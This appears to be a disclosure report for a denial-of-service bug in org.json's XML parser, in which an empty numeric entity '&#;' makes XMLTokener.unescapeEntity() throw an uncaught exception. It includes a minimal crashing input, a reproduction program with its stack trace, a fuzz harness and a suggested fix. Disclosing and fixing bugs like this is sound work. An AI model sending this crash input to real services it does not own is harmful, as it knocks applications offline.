Summary
XMLTokener.unescapeEntity() does not validate the length of numeric character references before accessing the second character. When processing empty entities like &#;, the code attempts to access e.charAt(1) on a string of length 1, causing StringIndexOutOfBoundsException and crashing applications that don't catch this unchecked exception.
Root Cause
The code accesses e.charAt(1) without checking string length:
Vulnerable Code (XMLTokener.java:162-164)
private String unescapeEntity(String e) {
    if (e.charAt(0) == '#') {
        if (e.charAt(1) == 'x' || e.charAt(1) == 'X') { // NO LENGTH CHECK!
            cp = Integer.parseInt(e.substring(2), 16);
        }
        // ...
    }
}
For the input &#;, the entity body passed in is e = "#" (length 1), so e.charAt(1) reads past the end of the string and throws StringIndexOutOfBoundsException.
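The failure can be reproduced without the library. The sketch below copies only the unchecked access pattern from the excerpt; the class name EmptyEntityDemo and the helper isHexReference are hypothetical and are not part of org.json.

```java
// Standalone illustration of the unchecked charAt(1) access.
// EmptyEntityDemo and isHexReference are hypothetical names, not org.json APIs.
class EmptyEntityDemo {

    // Mirrors the condition from the excerpt: index 1 is read without a length check.
    static boolean isHexReference(String e) {
        return e.charAt(0) == '#' && (e.charAt(1) == 'x' || e.charAt(1) == 'X');
    }

    public static void main(String[] args) {
        // Well-formed hexadecimal reference body: index 1 exists.
        System.out.println(isHexReference("#x41"));

        try {
            // Body of the empty reference "&#;": only index 0 exists.
            isHexReference("#");
        } catch (StringIndexOutOfBoundsException ex) {
            System.out.println("caught: " + ex.getClass().getSimpleName());
        }
    }
}
```

Because StringIndexOutOfBoundsException is unchecked, callers that only catch JSONException will not intercept it.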
PoC
Trigger file
Minimal input that triggers the vulnerability: <a>&#;</a>
How to generate crash_input.bin
echo '<a>&#;</a>' > crash_input.bin
# crash_gen.py
with open("crash_input.bin", "w") as f:
    f.write("<a>&#;</a>")
Trigger Method 1: Direct API Call (Library Usage)
import org.json.XML;

public class ReproduceXML {
    public static void main(String[] args) {
        // Minimal PoC - empty numeric entity
        String poc = "<a>&#;</a>";
        XML.toJSONObject(poc); // throws StringIndexOutOfBoundsException
    }
}
Build and run:
javac -cp . ReproduceXML.java
java -cp . ReproduceXML
Output:
java.lang.StringIndexOutOfBoundsException: Index 1 out of bounds for length 1
at java.lang.String.charAt(String.java:1555)
at org.json.XMLTokener.unescapeEntity(XMLTokener.java:164)
at org.json.XMLTokener.nextEntity(XMLTokener.java:148)
at org.json.XML.toJSONObject(XML.java:784)
Trigger Method 2: Fuzzer (Jazzer)
// Copyright 2025 O2Lab
// SPDX-License-Identifier: Apache-2.0
import org.json.XML;
import org.json.JSONException;
import java.nio.charset.StandardCharsets;

public class XmlToJsonFuzzer {
    public static void fuzzerTestOneInput(byte[] data) {
        String input = new String(data, StandardCharsets.UTF_8);
        try {
            XML.toJSONObject(input);
        } catch (JSONException e) {
            // Expected parsing errors - ignore
        }
        // StringIndexOutOfBoundsException is NOT caught - will crash fuzzer
    }
}
Build and run:
python3 infra/helper.py build_fuzzers --clean json-java
./XmlToJsonFuzzer corpus/
Impact
| Aspect | Details |
|---|---|
| Type | Denial of Service (DoS) |
| Severity | Medium |
| Attack Vector | Malformed XML entity &#; (empty numeric reference) |
| Affected Components | XML.toJSONObject(), XMLTokener.unescapeEntity() |
| Affected Versions | All versions up to 20251224 |
| CWE | CWE-129 (Improper Validation of Array Index) |
Suggested Fix
Add a length check before accessing the second character:
private String unescapeEntity(String e) {
    if (e.charAt(0) == '#') {
        if (e.length() < 2) {
            return ""; // or throw JSONException for invalid entity
        }
        if (e.charAt(1) == 'x' || e.charAt(1) == 'X') {
            cp = Integer.parseInt(e.substring(2), 16);
        } else {
            cp = Integer.parseInt(e.substring(1));
        }
        // ...
    }
}
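As a rough, self-contained sketch of the same idea, the class below validates the length first and also converts number-parsing failures into a single exception type. This matters because, in the snippet as written above, an input such as &#x; passes the length check (e = "#x") but Integer.parseInt("", 16) still throws an unchecked NumberFormatException. SafeEntityDecoder, decodeNumericEntity and InvalidEntityException are hypothetical names used for illustration; InvalidEntityException stands in for org.json.JSONException, and none of this is the library's actual implementation.

```java
// Hypothetical standalone sketch; not the org.json implementation.
class SafeEntityDecoder {

    /** Stand-in for org.json.JSONException so the example has no dependencies. */
    static class InvalidEntityException extends RuntimeException {
        InvalidEntityException(String message, Throwable cause) {
            super(message, cause);
        }
    }

    /**
     * Decodes the body of a numeric character reference, for example "#65"
     * or "#x41" (the text between '&' and ';').
     */
    static String decodeNumericEntity(String e) {
        // Length check first: "#" alone has no index 1.
        if (e == null || e.length() < 2 || e.charAt(0) != '#') {
            throw new InvalidEntityException("Invalid numeric character reference: &" + e + ";", null);
        }
        boolean hex = e.charAt(1) == 'x' || e.charAt(1) == 'X';
        String digits = hex ? e.substring(2) : e.substring(1);
        try {
            int cp = Integer.parseInt(digits, hex ? 16 : 10);
            // Character.toChars rejects values that are not valid Unicode code points.
            return new String(Character.toChars(cp));
        } catch (IllegalArgumentException ex) {
            // NumberFormatException is a subclass of IllegalArgumentException,
            // so empty or non-numeric digits ("#x", "#zz") are handled here too.
            throw new InvalidEntityException("Invalid numeric character reference: &" + e + ";", ex);
        }
    }

    public static void main(String[] args) {
        System.out.println(decodeNumericEntity("#65"));
        System.out.println(decodeNumericEntity("#x41"));
        for (String bad : new String[] {"#", "#x", "#zz"}) {
            try {
                decodeNumericEntity(bad);
            } catch (InvalidEntityException ex) {
                System.out.println("rejected: " + bad);
            }
        }
    }
}
```

Whether a malformed reference should raise an exception, as in this sketch, or be returned as an empty string, as in the snippet above, is a design decision for the maintainers. Throwing keeps malformed input visible to callers that already handle JSONException.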
Related to: #1036
Contribution: This potential vulnerability was found by AI-Based Vuln Detection system FuzzingBrain https://github.com/o2lab/afc-crs-all-you-need-is-a-fuzzing-brain.